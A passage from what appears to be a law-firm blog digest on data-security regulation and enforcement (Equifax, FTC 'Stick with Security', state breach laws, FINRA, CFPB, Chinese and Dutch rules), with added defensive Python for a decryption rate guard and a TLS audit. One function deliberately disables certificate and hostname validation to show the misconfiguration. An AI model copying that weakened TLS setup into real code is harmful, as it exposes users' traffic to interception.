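        self.store, self.max, self.window_s = store, max_per_window, window_s
        self.history, self.alerts = {}, []

    def get_ssn(self, principal, cid, now):
        recent = [t for t in self.history.get(principal, []) if now - t < self.window_s]
        if len(recent) >= self.max:
            self.alerts.append((principal, cid, now))
            raise PermissionError(f"{principal} exceeded {self.max} decrypts per window")
        recent.append(now)
        self.history[principal] = recent
        return self.store.get_ssn(cid)


def demo(records=20, cap=5):
    """Constructed scenario: code running as the app tries to read every record.
    Returns what each vantage point can read and where the guard stops it."""
    store = CustomerStore(os.urandom(32))
    for cid in range(1, records + 1):
        store.add(cid, f"000-00-{cid:04d}")  # constructed sample values
    guard, dumped = AccessGuard(store, max_per_window=cap), 0
    for cid in range(1, records + 1):
        try:
            guard.get_ssn("webapp", cid, now=float(cid))  # all inside one window
            dumped += 1
        except PermissionError:
            break
    return {
        "disk_sees_plaintext": b"000-00-0001" in store.raw_row(1),
        "app_sees_plaintext": store.get_ssn(1) == "000-00-0001",
        "records_read_before_block": dumped,
        "alerts_raised": len(guard.alerts),
    }


if __name__ == "__main__":
    print(demo())
```

The guard is deliberately simple; the design point is that it sits below the application's own code path, so it still applies when that code is the thing that has been subverted. Real deployments usually put the equivalent control in the database (row-level access policies, query auditing) or in a separate key service that can refuse or throttle decryption requests.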

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never-ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

FTC Posts Fifth Blog in Its “Stick with Security” Series

On August 18, 2017, the FTC published the fifth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Store sensitive personal information securely and protect it during transmission, outlines steps businesses can take to secure sensitive data, including when it is in transit.

The FTC’s reasonable protections include:

  • Keeping Sensitive Information Secure Throughout its Lifecycle: This involves knowing how sensitive data enters the business, moves within it and leaves the business. Once a business understands this roadmap, it is easier to implement security at every interval of data movement.
  • Use Industry-Tested and Accepted Methods: To ensure security, businesses should adopt industry-tested methods reflective of expert wisdom in the field. For example, a business that adopts tried and true encryption methods accepted by industry, and incorporates these methods into product development, acts more prudently than a business that uses its own proprietary method to obfuscate data.
  • Ensure Proper Configuration: When businesses choose to use strong encryption, they need to ensure they have configured it correctly. For example, a business using Transport Layer Security (“TLS”) must ensure the process to validate the TLS certificate is enabled. Following default recommendations likely will result in the correct setup, but businesses that change settings must ensure that they have the correct configuration.
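The configuration point in the last bullet is easy to check in code. The following is an added example, not the FTC's code or guidance: a Python TLS client context built from the standard library defaults (which validate the certificate and hostname), the weakened variant beside it that turns validation off, and an audit function that flags the weak settings before a connection is attempted. It uses only the `ssl` and `socket` modules; the `fetch_head` helper is hypothetical and needs network access, while the audit runs offline.

```python
"""Added example: TLS client context with certificate validation on, the
misconfigured variant, and an audit that catches the misconfiguration."""
import socket
import ssl


def hardened_context():
    """create_default_context() loads the system trust store, requires a peer
    certificate and checks the hostname; we additionally refuse TLS < 1.2."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def weakened_context():
    """The misconfiguration the post warns about: validation switched off,
    typically to silence a certificate error and never turned back on."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = False   # must be cleared before verify_mode may change
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx):
    """Return a list of findings; an empty list means the context validates the
    peer the way the defaults intend."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: peer certificate not validated")
    if not ctx.check_hostname:
        findings.append("check_hostname is False: certificate not matched to the host")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version allows TLS older than 1.2")
    return findings


def fetch_head(host, port=443, ctx=None):
    """Hypothetical helper: refuse to connect with a weak context, otherwise
    open a verified connection and send a minimal HEAD request. Passing
    server_hostname is what ties the certificate check to the intended host."""
    ctx = ctx or hardened_context()
    findings = audit_context(ctx)
    if findings:
        raise ValueError("refusing weak TLS context: " + "; ".join(findings))
    with socket.create_connection((host, port), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(f"HEAD / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode())
            return tls.recv(4096)


if __name__ == "__main__":
    print("hardened:", audit_context(hardened_context()) or "no findings")
    print("weakened:", audit_context(weakened_context()))
```

Running the audit against every context a code base constructs (for example in a unit test) is one way to enforce the "default recommendations" the post refers to, so that a setting changed during debugging cannot quietly ship.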

The FTC’s next blog post, to be published on Friday, August 25, will focus on segmenting networks and monitoring who is trying to get in and out.

To read our previous posts documenting the series, see FTC Posts Fourth Blog in its “Stick with Security” Series, FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

Colorado Publishes Cybersecurity Regulations for Financial Institutions

Recently, the Colorado Division of Securities (the “Division”) published cybersecurity regulations for broker-dealers and investment advisers regulated by the Division. Colorado’s cybersecurity regulations follow similar regulations enacted in New York that apply to certain state-regulated financial institutions.

The regulations obligate covered broker-dealers and investment advisers to establish and maintain written cybersecurity procedures designed to protect “confidential personal information” which is defined to include a Colorado resident’s first name or first initial and last name, plus (1) Social Security number; (2) driver’s license number or identification card number; (3) account number or credit or debit card number, in combination with any required security code, access code or password that would permit access to a resident’s financial account; (4) digitized or other electronic signature or (5) user name, unique identifier or electronic mail address in combination with a password, access code security question or other authentication information that would permit access to an online account.

The cybersecurity procedures must include:

  • an annual assessment by the firm or an agent of the firm of the potential risks and vulnerabilities to the confidentiality, integrity and availability of confidential personal information;
  • the use of secure email for email containing confidential personal information, including use of encryption and digital signatures;
  • authentication practices for employee access to electronic communications, databases and media;
  • procedures for authenticating client instructions received via electronic communication; and
  • disclosure to clients of the risks of using electronic communications.

In determining whether a firm’s cybersecurity procedures are reasonably designed, the Division may consider the firm’s size, relationships with third parties and cybersecurity policies and procedures. The Division may also consider the firm’s (1) authentication practices, (2) use of electronic communications, (3) use of automatic locking mechanisms for devices that have access to confidential personal information and (4) process for reporting lost or stolen devices.

The Colorado Secretary of State will set an effective date for the Colorado regulations after the Colorado Attorney General’s office issues an opinion on the regulations.

New York AG Settles with Wireless Lock Maker Over Security Flaws

On May 22, 2017, New York Attorney General Eric T. Schneiderman announced that the AG’s office has reached a settlement (the “Settlement”) with Safetech Products LLC (“Safetech”) regarding the company’s sale of insecure Bluetooth-enabled wireless doors and padlocks. In a press release, Schneiderman indicated that this “marks the first time an attorneys general’s office has taken legal action against a wireless security company for failing to protect their [customers’] personal and private information.”

The Settlement stems from Safetech’s representations that its products would allow users the ability to protect personal belongings inside their homes by turning doors and closets into secure areas. In August 2016, however, a team of independent security researchers discovered that Safetech’s Bluetooth-enabled locks left consumers susceptible to hacking and theft because the locks failed to secure passwords and other security information required for operation. Specifically, the researchers found that Safetech’s locks transmitted passwords between the locks and users’ smartphones in plain text and without encryption, allowing potential perpetrators to intercept the passwords and open the locks. The researchers also discovered that the locks contained weak and insecure default passwords that could easily be discovered through brute-force attacks, in which automated software generates a large number of consecutive guesses.

The Settlement requires Safetech to encrypt all passwords, electronic keys or other security credentials in their locks and other Bluetooth-enabled devices, as well as prompt users to change the default password upon the users’ initial setup of wireless communication. The Settlement also requires Safetech to establish and implement a written comprehensive security program reasonably designed to (1) address security risks related to the development and management of new and existing devices that use security information, and (2) protect the privacy, security, confidentiality and integrity of security information, including:

  • designating an employee or employees to coordinate and be accountable for the security program;
  • identifying material internal and external risks to (1) the security of the devices that could result in unauthorized access to or unauthorized modification of the device and (2) the privacy, security, confidentiality and integrity of security information;
  • designing and implementing reasonable safeguards to control the risks identified through the risk assessment;
  • regularly testing or monitoring the effectiveness of the safeguards’ key controls, systems and procedures, including reasonable and appropriate security testing techniques such as vulnerability and penetration testing, security architecture reviews and code reviews;
  • developing and using reasonable steps to select and retain service providers capable of maintaining security practices consistent with the Settlement, and contractually requiring service providers to implement and maintain appropriate safeguards consistent with the Settlement; and
  • evaluating and adjusting Safetech’s security program in light of the results of the testing and monitoring required by the Settlement.

New Mexico Enacts Data Breach Notification Law

On April 6, 2017, New Mexico became the 48th state to enact a data breach notification law, leaving Alabama and South Dakota as the two remaining states without such requirements. The Data Breach Notification Act (H.B. 15) goes into effect on June 16, 2017.

Key Provisions of New Mexico’s Data Breach Notification Act:

  • The definition of “personal identifying information” includes biometric data, defined as an individual’s “fingerprints, voice print, iris or retina patterns, facial characteristics or hand geometry that is used to uniquely and durably authenticate an individual’s identity when the individual accesses a physical location, device, system or account.”
  • The law applies to unencrypted computerized data or encrypted computerized data when the encryption key or code is also compromised.
  • Notice to the New Mexico Office of the Attorney General and the major consumer reporting agencies is required if more than 1,000 New Mexico residents are notified.
  • Notice must be made to New Mexico residents (and the Attorney General and Consumer Reporting agencies if over 1,000 residents are notified) within 45 calendar days of discovery of a security breach.
    • Third-party service providers are also required to notify the data owner or licensor within 45 days of discovery of a data breach.
  • Notification is not required if, after an appropriate investigation, it is determined that the security breach does not give rise to a significant risk of identity theft or fraud.
  • Entities that are subject to the Gramm-Leach-Bliley Act or HIPAA are exempt from the statute.
  • The law also contains a data disposal provision that requires data owners or licensors to shred, erase or otherwise make unreadable personal identifying information contained in records when it is no longer “reasonably needed” for business purposes.
  • In addition, the law requires data owners and licensors to implement and maintain reasonable security procedures and practices designed to protect the personal identifying information from unauthorized access, destruction, use, modification or disclosure.
    • Contracts with third-party service providers must require that the service provider implement and maintain such security procedures and practices.

Virginia Adds State Income Tax Provision to Data Breach Notification Law

Recently, Virginia passed an amendment to its data breach notification law that adds state income tax information to the types of data that require notification to the Virginia Office of the Attorney General in the event of unauthorized access and acquisition of such data. Under the amended law, an employer or payroll service provider must notify the Virginia Office of the Attorney General after the discovery or notification of unauthorized access and acquisition of unencrypted and unredacted computerized data containing a Virginia resident’s taxpayer identification number in combination with the income tax withheld for that taxpayer. 

The amendment contains a harm threshold, requiring notification when such unauthorized access and acquisition compromises the confidentiality of the data and causes, or reasonably will cause, identity theft or fraud. For employers, the amendment applies only to the employer’s Virginia employees, and not to information regarding the employer’s customers or non-employees. Notification to the Virginia Office of the Attorney General must be made “without unreasonable delay” and must include the name and federal employer identification number of the employer that may be affected by the incident. The amendment requires notification only to the Virginia Office of the Attorney General, and not affected individuals. The amendment takes effect on July 1, 2017.

Health Insurer Reaches Privacy Settlement with New Jersey Division of Consumer Affairs

On February 17, 2017, Horizon Blue Cross Blue Shield of New Jersey (“Horizon”) agreed to pay $1.1 million as part of a settlement with the New Jersey Division of Consumer Affairs (the “Division”) regarding allegations that Horizon did not adequately protect the privacy of nearly 690,000 policyholders.

The settlement stemmed from the theft of two laptops from Horizon headquarters in November 2013, when personnel from outside vendors performing renovations and moving services at Horizon’s Newark headquarters had unsupervised access to the area where company laptops were stored. The stolen laptops contained policyholder electronic Protected Health Information (“ePHI”), including names, addresses, birth dates, insurance identifications and, in some cases, Social Security numbers and clinical data. The policyholder data was password protected but not encrypted, in violation of HIPAA and HITECH.

An investigation by the Division found that more than 100 company-owned laptops assigned to Horizon employees were not encrypted, in violation of HIPAA and HITECH, as well as a company policy requiring company-issued laptops to contain encryption software. The Division found that most of these unencrypted laptops were obtained outside Horizon’s normal procurement process, and therefore the IT department failed to adequately monitor, service or install security software required by company policy on those laptops. The Division further found that the stolen laptops were issued to employees who were not required to store ePHI on their laptops, in violation of another company policy restricting ePHI access to employees with a “need to know.” The relevant company policies were instituted after an unrelated 2008 laptop theft from an employee’s car.

Under the terms of the settlement, in addition to the $1.1 million monetary settlement, which breaks down into a civil penalty, a reimbursement of the state’s attorneys’ fees and investigative costs, and promotion of consumer privacy programs, Horizon must take corrective steps to address its data security practices with respect to ePHI. In particular, Horizon must hire a third-party professional to assess the security risks associated with its storage, transmission and receipt of ePHI, and submit a report of those findings to the Division within 180 days of the settlement, and every year thereafter for two years. $150,000 in civil penalties is suspended pending Horizon’s compliance with the terms of the settlement.

OMB Publishes Memorandum on Responding to Data Breaches

On January 3, 2017, the Office of Management and Budget (“OMB”) issued a memorandum (the “Breach Memorandum”) advising federal agencies on how to prepare for and respond to a breach of personally identifiable information (“PII”). The Breach Memorandum, which is intended for each agency’s Senior Agency Official for Privacy (“SAOP”), updates OMB’s breach notification policies and guidelines in accordance with the Federal Information Security Modernization Act of 2014 (“FISMA”).

The Breach Memorandum sets the stage by discussing the evolving threat and risk landscape, noting that there has been a 27 percent increase in the number of incidents reported by federal agencies from 2013 to 2015. The Breach Memorandum defines a “breach,” which is a type of incident, as “[t]he loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or any similar occurrence where (1) a person other than an authorized user accesses or potentially accesses personally identifiable information or (2) an authorized user accesses or potentially accesses personally identifiable information for an other than authorized purpose.” This definition goes beyond the definition contained in many state breach notification laws by including incidents of “potential” access to PII.

The Breach Memorandum next notes the importance of breach response and awareness training, and emphasizes key provisions to include in agency contracts that obligate contractors to (1) encrypt PII in accordance with OMB and agency-specific guidelines, (2) report breaches to the relevant agency as soon as possible and (3) cooperate with any forensic investigation and analysis. With respect to breach reporting, the Breach Memorandum encourages each agency to set up a simple email address, such as breach@[agency].gov, to which individuals may report suspected or confirmed breaches.

The Breach Memorandum then focuses on breach response plans. It requires each SAOP to develop and implement a breach response plan that:

  • establishes a Breach Response Team at each agency to be headed by the SAOP;
  • identifies applicable privacy compliance documentation such as system of record notices and privacy impact assessments;
  • facilitates information sharing within the agency or between agencies for the purposes of reconciling or eliminating duplicate records, identifying potentially affected individuals or obtaining individuals’ contact information;
  • analyzes reporting requirements to determine whether a specific breach requires the agency to notify law enforcement or Congress;
  • assesses the risk of harm to potentially affected individuals by considering factors such as the PII at issue, the likelihood of access to and use of the information, and the relevant actors involved;
  • mitigates the risk of harm to potentially affected individuals, such as by purchasing identity theft protection services for potentially affected individuals; and
  • notifies individuals affected by a breach, using the most appropriate method of notification.

Following a breach, agencies must track and document the response to each breach via a standard internal reporting template and identify any lessons learned from a breach. In addition, the SAOP and the agency must annually: (1) conduct a tabletop exercise, (2) review the breach response plan and consider potential updates and (3) submit an annual FISMA report on the adequacy of the agency’s information security policies and procedures.

The Breach Memorandum contains several appendices that can be used as resources for federal agencies, including a model breach reporting template, examples of services an agency may provide to affected individuals and a list of federal laws, executive orders, memoranda and directives that address data breaches.

FINRA Fines Brokerage Firm $650,000 After Cyber Attack

On November 14, 2016, Lincoln Financial Securities Corp. (“LFS”), a subsidiary of Lincoln Financial Group, entered into a settlement (the “Settlement”) with the Financial Industry Regulatory Authority (“FINRA”), requiring LFS to pay a $650,000 fine and implement stronger cybersecurity protocols following a 2012 hack into its cloud-based server.

In 2012, hackers with foreign IP addresses accessed LFS’s cloud server and stole confidential records of approximately 5,400 customers. The stolen records included account applications and other brokerage records containing customers’ nonpublic personal information, including Social Security numbers. LFS timely notified affected individuals and FINRA about the breach and, to date, there is no evidence of any misuse of customer information resulting from the theft. In the Settlement, however, FINRA alleged that LFS failed to implement and maintain adequate cybersecurity procedures, including written supervisory procedures, designed to protect confidential customer information stored on electronic systems in violation of FINRA Rules 3110 and 2010. FINRA alleged that when LFS began storing records on cloud-based servers in 2011, LFS failed to ensure that the third-party vendor retained to configure the cloud system properly installed antivirus software or data encryption for the confidential information, and that this failure led to the 2012 hack.

Under the terms of the Settlement, LFS will pay a $650,000 penalty to FINRA. In addition, LFS is required to review its written supervisory procedures and security systems and implement all necessary changes to enhance security. LFS previously was fined $450,000 by FINRA in 2011 for failing to establish adequate procedures to protect confidential customer information stored on its web-based electronic portfolio management system.

Korean Privacy Law Updated

On September 22, 2016, Korean law firm Bae, Kim & Lee LLC released a Legal Update outlining amendments to Korea’s Personal Information Protection Act (“PIPA”) and the Act on the Promotion of IT Network Use and Information Protection (“IT Network Act”).

The amendments to PIPA include:

  • notification requirements for third-party transfers; and
  • an obligation to submit to regular inspection by MOI.

Effective September 30, 2016, “companies that either process sensitive information or unique identifying information of 50,000 data subjects or more, or process personal information of 1 million data subjects or more should be prepared to implement the obligation to notify data subjects if personal information has been obtained indirectly from third parties [and] comply with MOI’s request for document review in connection with MOI’s regular inspection on the company’s security measures.”

Amendments to the IT Network Act include clarification of the statutory retention period applicable to unused data. This amendment addresses “the issue of how the IT service providers should handle personal data whose ‘statutory retention period’ has expired, but which data the IT service provider has a legal obligation to retain pursuant to other laws.”

Read Bae, Kim & Lee’s Legal Update.

FTC Orders Mobile Device Manufacturers to Provide Information about Security Updates for Study

On May 9, 2016, the Federal Trade Commission announced it had issued Orders to File a Special Report (“Orders”) to eight mobile device manufacturers requiring them to, for purposes of the FTC’s ongoing study of the mobile ecosystem, provide the FTC with “information about how [the companies] issue security updates to address vulnerabilities in smartphones, tablets, and other mobile devices.” The FTC’s authority to issue such Orders comes from Section 6(b) of the FTC Act.

The following companies are receiving the orders:

  • Apple, Inc.;
  • Blackberry Corp.;
  • Google, Inc.;
  • HTC America, Inc.;
  • LG Electronics USA, Inc.;
  • Microsoft Corp.;
  • Motorola Mobility, LLC; and
  • Samsung Electronics America, Inc.

Among other details, the Orders require the relevant companies to provide information regarding:

  • factors the companies consider in deciding whether to patch a vulnerability on a particular mobile device;
  • any written policies, contracts, testing or certification documentation the companies maintain regarding mobile device security;
  • disclosures the companies have made to consumers regarding mobile device security updates;
  • (1) detailed data on the specific mobile devices the companies have offered for sale to consumers since August 2013; (2) the vulnerabilities that have affected those devices; and (3) whether and when the companies patched such vulnerabilities.

The companies must file their responses within 45 days from the date of service of the Orders.

Amended Nebraska Data Breach Notification Law Adds Regulator Notification Requirement

On April 13, 2016, Nebraska Governor Pete Ricketts signed into law LB 835 (the “Bill”), which among other things, adds a regulator notification requirement and broadens the definition of “personal information” in the state’s data breach notification statute, Neb. Rev. Stat. §§ 87-802 to 87-804. The amendments take effect on July 20, 2016.

Specifically, the Bill:

  • requires entities to notify the Nebraska Attorney General in the event of a data breach, and no later than notice is provided to Nebraska residents;
  • adds to the definition of “personal information” a user name or email address, in combination with a password or security question and answer, that would permit access to an online account; and
  • states that data is not considered “encrypted” for purposes of avoiding notification obligations if the confidential process or key was or is reasonably believed to have been acquired as a result of the breach.

Lisa Sotto Featured in SC Magazine Article – Ready to Rumble: Apple v. FBI

In a recent article published by SC Magazine, Lisa Sotto, head of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice, provides commentary on the recent case, Apple v. FBI. The article analyzes privacy versus security, and Sotto tells SC Magazine, “[the case] should never have escalated to this, privacy should have been addressed” at the onset of the investigation. Sotto says the government should have “worked with tech companies to craft policies and processes” before an issue of this magnitude arose. The article provides details on the case and discusses differentiators that set the case apart from similar issues in the past, and also provides insight into legislation that could regulate privacy and security matters in the future. Many believe Congress should step in, including Sotto who says, “The courts can’t keep doing it on a piecemeal basis.”

Read the full article.

Draft E-Commerce Standards Published for Comment in China

On March 22, 2016, the Ministry of Commerce of the People’s Republic of China published drafts of its proposed (1) Specifications for Business Services in Mobile E-commerce (“Mobile E-commerce Specifications”) and (2) Specifications for Business Services in Cross-border E-commerce (“Cross-border E-commerce Specifications”). A public comment period on these drafts is now open. Comments will be accepted until May 31, 2016.

The Mobile E-commerce Specifications contain several provisions that require service providers in the e-commerce sector to take measures to ensure the security of operational data and service platforms. According to the Mobile E-commerce Specifications, “service providers in the electronic commerce sector” refers to platform service providers who provide e-commerce transaction platforms that are accessed over mobile devices. The Mobile E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics services providers, payment service providers and purchasers via mobile devices.

Under the draft specifications, platform service providers would be responsible for the handling of transaction information and relevant personal information from online sellers. The authorization of the data subject would be required before collecting and processing personal information. The collection of transaction information would have to be authorized by the parties to the transaction.

In addition, personal and transaction information may not be directly used for commercial purposes unless it has been desensitized. Platform service providers could, with the consent of an online seller, transfer, copy, transmit or process desensitized data from the online seller. Personal information would have to be encrypted before being transferred online. Also, a record must be maintained of any disclosures of personal and transaction data to administrative authorities, enforcement authorities or the judiciary.

Platform service providers also would be responsible for the management of the platform’s data security. Personal data from online sellers should be isolated on the platform, and only the data owner should have access to the data. Modifications to original data stored on the platform should be authorized only by the data subject. Platform service providers would be responsible for protecting personal data from online sellers from loss.

The Cross-border E-commerce Specifications would impose similar requirements and obligations in a separate, but closely related, category and would apply the same obligations under the Mobile E-commerce Specifications to e-commerce service providers who provide e-commerce transaction platforms for the purchase and sale of cross-border goods. The Cross-border E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics providers, payment service providers and purchasers of cross-border goods.

Consumer Financial Protection Bureau Imposes First Ever Data Security Fine

On March 2, 2016, the Consumer Financial Protection Bureau (“CFPB”) reached a settlement with Dwolla, Inc. (“Dwolla”), an online payment system company, to resolve claims that the company made false representations regarding its data security practices in violation of the Consumer Financial Protection Act. Among other things, the consent order imposes a $100,000 fine on Dwolla. This marks the first data security-related fine imposed by the CFPB.

In the consent order, the CFPB alleges that Dwolla misrepresented that it “employ[ed] reasonable and appropriate measures to protect data obtained from consumers from unauthorized access,” and that its network and transactions were “safe,” “secure” and compliant with the standards set forth by the PCI Security Standards Council. Specifically, the CFPB found that Dwolla failed to:

  • adopt and implement data security policies and procedures reasonable and appropriate for the organization;
  • use appropriate measures to identify reasonably foreseeable security risks;
  • ensure that employees who have access to or handle consumer information received adequate training and guidance about security risks;
  • use encryption technologies to properly safeguard sensitive consumer information; and
  • practice secure software development, particularly with regard to consumer-facing applications developed on an affiliated website, Dwollalabs.com.

In addition to the $100,000 fine, Dwolla was ordered, for the next five years, to adopt and implement reasonable and appropriate data security measures to protect consumers’ personal information on its networks and applications, including:

  • implementing a comprehensive data security plan reasonably designed to protect the confidentiality, integrity and availability of sensitive consumer information;
  • conducting semiannual data security risk assessments;
  • conducting regular, mandatory employee training on (1) data security policies and procedures, (2) the safe handling of consumers’ sensitive personal information, and (3) secure software design, development and testing;
  • obtaining an annual data security audit from an independent, qualified third party, using procedures and standards generally accepted in the profession; and
  • implementing reasonable procedures for the selection and retention of service providers capable of maintaining security practices consistent with the consent order, and requiring service providers by contract to implement and maintain appropriate safeguards.

California Attorney General Releases Report Defining “Reasonable” Data Security

On February 16, 2016, California Attorney General Kamala D. Harris released the California Data Breach Report 2012-2015 (the “Report”) which, among other things, provides (1) an overview of businesses’ responsibilities regarding protecting personal information and reporting data breaches and (2) a series of recommendations for businesses and state policy makers to follow to help safeguard personal information. Importantly, the Report states that, “[t]he failure to implement all the [Center for Internet Security’s Critical Security] Controls that apply to an organization’s environment constitutes a lack of reasonable security” under California’s information security statute. Cal. Civ. Code § 1798.81.5(b) requires that “[a] business that owns, licenses, or maintains personal information about a California resident shall implement and maintain reasonable security procedures and practices appropriate to the nature of the information, to protect the personal information from unauthorized access, destruction, use, modification, or disclosure.” The Center for Internet Security’s Critical Security Controls are a set of 20 cybersecurity defensive measures meant to “detect, prevent, respond to, and mitigate damage from cyber attacks.”

The Report also provides the following recommendations:

  • Organizations should make multi-factor authentication available on consumer-facing online accounts that contain sensitive personal information.
  • Organizations, particularly in the health care industry, should consistently use strong encryption to protect personal information on laptops and other portable devices, and should consider it for desktop computers.
  • Organizations should encourage individuals affected by a breach of Social Security numbers or driver’s license numbers to place a fraud alert on their credit files and make this option very prominent in their breach notices.
  • State policy makers should collaborate to harmonize state breach laws on some key dimensions. Such an effort could reduce the compliance burden for companies, while preserving innovation, maintaining consumer protections and retaining jurisdictional expertise.

FTC Settles with Dental Practice Software Provider over Charges of Misleading Consumers with Respect to Data Encryption

On January 5, 2016, the Federal Trade Commission announced that dental office management software provider, Henry Schein Practice Solutions, Inc. (“Schein”), agreed to settle FTC charges that accused the company of falsely advertising the level of encryption it used to protect patient data. The proposed Agreement Containing Consent Order (“Consent Order”) stems from an FTC complaint that alleged the company engaged in unfair or deceptive acts or practices by falsely representing that the Dentrix G5 software used industry-standard encryption and helped dentists protect patient data in accordance with the Health Insurance Portability and Accountability Act of 1996 (“HIPAA”).

Dentrix G5 is a type of software that enables dentists to perform office tasks such as entering patient data and sending appointment reminders. The FTC asserted that, in 2012, the Dentrix G5 software incorporated a third party database engine that included a form of data protection that Schein advertised as “encryption.” According to the complaint, as early as November 2010, the database engine vendor notified Schein that the form of data protection used in Dentrix G5 was a “proprietary algorithm that had not been tested publicly, and was less secure and more vulnerable than widely-used, industry-standard encryption algorithms, such as Advanced Encryption Standard (“AES”) encryption.”

The FTC alleged that Schein was aware that the Department of Health and Human Services (“HHS”) directs health care providers (including most dentists) to protect patient data in accordance with guidance promulgated by the National Institute of Standards and Technology (“NIST”), which recommends AES encryption. Similarly, HHS’ Breach Notification rule requires covered entities responding to a data breach to consider whether the compromised data was encrypted in accordance with the NIST Special Publication 800-111.

According to the complaint, the United States Computer Emergency Readiness Team issued a vulnerability note in June 2013 indicating that the form of data protection used in Dentrix G5 software was a “weak obfuscation algorithm.” In response, the database engine vendor agreed to rebrand the data protection method as “Data Camouflage” instead of “encryption.” Nevertheless, despite the alert and rebranding, Schein continued to distribute marketing materials stating that Dentrix G5 “encrypts” patient data and offers “encryption.”

The proposed Consent Order will prohibit Schein from misrepresenting whether, and to what extent, the product or service offers industry-standard encryption, helps customers meet regulatory obligations, or maintains the privacy, security, confidentiality and integrity of personal information. The Consent Order will require Schein to notify affected customers that Dentrix G5 uses a less complex encryption algorithm than AES, and provide the FTC with ongoing reports on the notification program. In addition, Schein will be required to pay $250,000 to the FTC.

China Enacts Administrative Measures for Online Payment Businesses

On December 28, 2015, the People’s Bank of China published Administrative Measures for Online Payment Business of Non-bank Payment Institutions (the “Measures”). The Measures were enacted to provide further details on the regulation of online payment businesses, in supplement to the earlier Administrative Measures for the Payment Services of Non-financial Institutions (the “2010 Measures”), published by the People’s Bank of China on June 14, 2010. The 2010 Measures regulated the conduct of all payment services, including both online payment methods and three other types of payment methods, by all types of Non-bank Payment Institutions (“NBPIs”). The newer Measures are more focused and apply only to online payment methods, and only to NBPIs which have already obtained a Payment Business License and are engaged in an online payment business.

The impact of the Measures will reach beyond the payment market itself to promote the development of the e-commerce and Internet finance sectors in China. The Measures will come into effect on July 1, 2016. Consistent with the 2010 Measures, the new Measures require NBPIs to take effective protective measures for the security of their clients’ personal information, and to adopt risk control systems. The Measures further restrict the storage of clients’ sensitive information, such as track information or chip information of their clients’ bank cards, their verification codes or passwords. In principle, NBPIs are not allowed to store the effective term of the bank cards, unless they are stored for special business needs or pursuant to authorization by the clients and the banks opening the bank cards. Further, this information must be encrypted prior to storage.

Under the Measures, NBPIs are required to collect, use, store and transfer clients’ information only to the minimum extent necessary, and to notify clients of the purpose and scope of their use of the information. The Measures restrict NBPIs from providing clients’ information to other institutions or individuals, unless otherwise required by laws and regulations, or unless the provision of each item was confirmed and authorized by the clients.

The Measures also impose responsibilities on the NBPIs to bind the merchants which are counterparties to their online payment services. NBPIs are required to sign agreements with the merchants, prohibiting the merchants from storing sensitive information of their clients, and to adopt supervisory measures, such as periodic checks and technical monitoring, as may be necessary. If the merchants store sensitive information in violation of the agreement, the NBPIs are required to promptly suspend or terminate their provision of online payment services for these merchants, and adopt effective measures to delete the sensitive information and to prevent disclosure of it. The NBPIs also may be liable for losses and liabilities caused by the disclosure of relevant information.

The Measures further require NBPIs to maintain online payment business processing systems that are safe and comply with normative specifications, and related backup systems, within the territory of China. When providing services for domestic transactions, NBPIs are required to complete the transactions using their domestic business processing systems, and to complete the financial settlement within the territory of China.

Dutch Law Includes General Data Breach Notification Obligation and Larger Fines for Violations of the Data Protection Act

On January 1, 2016, a Dutch law became effective that (1) includes a general obligation for data controllers to notify the Data Protection Authority (“DPA”) of data security breaches, and (2) authorizes the DPA to impose direct fines for violations of the Data Protection Act.

Under the law, data controllers are required to immediately notify the DPA of any data security breaches that have, or are likely to have, serious adverse consequences to the protection of personal data. In addition, data controllers are required to notify affected individuals if there is reason to believe the breach could lead to adverse consequences to those individuals, unless the compromised data is encrypted or otherwise unintelligible to third parties. On December 9, 2015, the DPA published practical guidance to help organizations identify cases when data security breaches must be reported to the DPA and data subjects.

The new Dutch law also empowers the DPA to impose fines of up to €820,000 for violations of the Data Protection Act, including failure to report data security breaches. Last October, the DPA published draft guidance that defines the different violations, the categories of sanctions and the level of fines.

Read the Dutch DPA’s press release.

Blockchain, Cybersecurity and Global Finance

When novelist William Gibson said, “[t]he future is already here, it’s just not very evenly distributed,” he may have had innovation like blockchain technology in mind. In the near future, blockchain may become the new architecture of a reinvented global financial services infrastructure. The technology – a distributed, consensus-driven ledger that enables and records encrypted digital asset transfers without the need for a confirming third party – is revolutionary to global financial services, whose core functions include the trusted intermediary role (e.g., payment processor, broker, dealer, custodian).

